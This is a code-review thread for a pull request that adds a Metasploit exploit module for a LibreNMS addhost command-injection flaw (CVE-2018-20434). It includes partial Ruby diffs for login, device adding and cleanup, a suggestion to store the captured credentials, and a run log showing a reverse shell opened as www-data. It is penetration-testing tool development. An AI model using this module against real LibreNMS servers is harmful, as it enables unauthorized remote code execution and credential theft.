### PR TITLE
Add exploit module for LibreNMS CVE-2018-20434

### PR DESCRIPTION
**Pull request by space-r7**
This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code.

This module has been tested on LibreNMS `v1.45` and `v1.46`.

## Verification

 - [x] Install the application
 - [x] Start msfconsole
 - [x] Do: ```use exploit/linux/http/librenms_cmd_injection```
 - [x] Do: ```set RHOSTS <ip>```
 - [x] Do: ```set USERNAME <user>```
 - [x] Do: ```set PASSWORD <pass>```
 - [x] Do: ```run```
 - [x] You should get a shell.

### CODE REVIEW

File: modules/exploits/linux/http/librenms_cmd_injection.rb [hunk 1]
```diff
@@ -0,0 +1,160 @@
...
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS Cmd Injection',
```
Comment (bcoles) [inline modules/exploits/linux/http/librenms_cmd_injection.rb]: Name the functionality, and ensure the file name matches.

Consider:

```suggestion
      'Name'           => 'LibreNMS addhost Command Injection',
```

File: modules/exploits/linux/http/librenms_cmd_injection.rb [hunk 2]
```diff
@@ -0,0 +1,160 @@
...
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'username'  =>  datastore['USERNAME'],
+        'password'  =>  datastore['PASSWORD'],
+        'submit'    =>  ''
+      }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to log in') unless login_res
```
Comment (bcoles) [inline modules/exploits/linux/http/librenms_cmd_injection.rb]:
```suggestion
    fail_with(Failure::NoAccess, 'Failed to log in') unless login_res
```

File: modules/exploits/linux/http/librenms_cmd_injection.rb [hunk 3]
```diff
@@ -0,0 +1,160 @@
...
+        'port_assoc_mode' =>  'ifIndex',
+        'Submit'          =>  ''
+      }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added')
+    print_good("Successfully added device with hostname #{@hostname}")
+
+    host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text
+    fail_with(Failure::NotFound, 'Couldn\'t retrieve the id for the device') if host_id.empty?
```
Comment (bcoles) [inline modules/exploits/linux/http/librenms_cmd_injection.rb]:
```suggestion
    fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty?
```

File: documentation/modules/exploit/linux/http/librenms_cmd_injection.md [hunk 4]
```diff
@@ -0,0 +1,64 @@
...
+  The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
+  a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
+  and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
+  is passed to the `popen()` function, which results in execution of arbitrary code.
+
+  This module has been tested on LibreNMS `v1.46` and `v1.45`.
+
+## Vulnerable Application
+
+  A vulnerable version of LibreNMS for Ubuntu can be installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
```
Comment (bcoles) [inline documentation/modules/exploit/linux/http/librenms_cmd_injection.md]: It looks like there's also some pre-built OVA virtual appliances which may be worth testing and mentioning here:

* https://github.com/librenms/packer-builds/releases/tag/1.46

Comment (space-r7) [reply documentation/modules/exploit/linux/http/librenms_cmd_injection.md]: Thanks, I'll list that!

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb [hunk 5]
```diff
@@ -0,0 +1,160 @@
...
+      OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
+      OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
+      OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
+    ])
+  end
+
+  def login
+    login_uri = normalize_uri(target_uri.path, 'login')
+    res = send_request_cgi('method' =>  'GET', 'uri'  =>  login_uri)
+    fail_with(Failure::NotFound, 'Failed to access the login page') unless res
```
Comment (jrobles-r7) [inline modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]: Maybe check for status code here as well. If a 404 is received this currently keeps going.

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb [hunk 6]
```diff
@@ -0,0 +1,160 @@
...
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'username'  =>  datastore['USERNAME'],
+        'password'  =>  datastore['PASSWORD'],
+        'submit'    =>  ''
+      }
+    )
+
+    fail_with(Failure::NoAccess, 'Failed to log in') unless login_res
```
Comment (jrobles-r7) [inline modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]: Maybe check for status code here as well or a message indicating success/failed login.

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb [hunk 7]
```diff
@@ -0,0 +1,160 @@
...
+    print_status('Successfully logged into LibreNMS')
+
+    login_res.get_cookies
+  end
+
+  def add_device(cookies)
+    add_uri = normalize_uri(target_uri.path, 'addhost')
+    @hostname = Rex::Text.rand_text_alpha(6...12).to_s
```
Comment (jrobles-r7) [inline modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]:
```suggestion
    @hostname = Rex::Text.rand_text_alpha(6...12)
```

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb [hunk 8]
```diff
@@ -0,0 +1,160 @@
...
+
+    login_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  login_uri,
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'username'  =>  datastore['USERNAME'],
+        'password'  =>  datastore['PASSWORD'],
+        'submit'    =>  ''
```
Comment (jrobles-r7) [inline modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]: Can submit be removed?

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb [hunk 9]
```diff
@@ -0,0 +1,160 @@
...
+        'confirm' =>  1
+      }
+    )
+
+    print_status('Unsure if device was deleted. No response received') unless res
+
+    if res.body.include?("Removed device #{@hostname.downcase}")
+      print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}")
+    else
+      print_status("Failed to delete device. Manual deletion may be needed")
```
Comment (jrobles-r7) [inline modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]:
```suggestion
      print_status('Failed to delete device. Manual deletion may be needed')
```

File: documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md [hunk 10]
```diff
@@ -0,0 +1,66 @@
...
+  is passed to the `popen()` function, which results in execution of arbitrary code.
+
+  This module has been tested on LibreNMS `v1.46` and `v1.45`.
+
+## Vulnerable Application
+
+  A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.
+
+  Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
+  In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master`
```
Comment (jrobles-r7) [inline documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md]: Remove extra new line at the end.

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb [hunk 11]
```diff
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
```
Comment (wchen-r7) [inline modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]: I bet this is better than NormalRanking. How about a bump? Like... **EXCELLENT**

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb (hunk 8 above)
Comment (wchen-r7) [reply modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]: Maybe that's what the form is submitting.

File: modules/exploits/linux/http/librenms_addhost_cmd_inject.rb (hunk 6 above)
Comment (wchen-r7) [reply modules/exploits/linux/http/librenms_addhost_cmd_inject.rb]: I would also save the username and password to database if the login is successful. People would love that.

```
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
```

**Comment by wchen-r7** [comment]
I'm actually done reviewing. Code looks good to me. Nice work @space-r7 !

**Comment by space-r7** [comment]
> I'm actually done reviewing. Code looks good to me. Nice work @space-r7 !

Thanks for the review!

**Comment by jrobles-r7** [comment]
Using pre-built v1.46 OVA

```
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit

[*] Started reverse TCP double handler on 172.22.222.136:4444 
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname cJKrXaerk
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname cJKrXaerk and id #2
[*] Command: echo 4kWimSISfcFWx1in;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "4kWimSISfcFWx1in\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.141:35844) at 2019-06-04 12:17:04 -0500

whoami
www-data
uname -a
Linux librenms 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

**Comment by jrobles-r7** [comment]
## Release Notes

This module exploits a command injection vulnerability in the open source network management software known as LibreNMS.

**Pull request merged**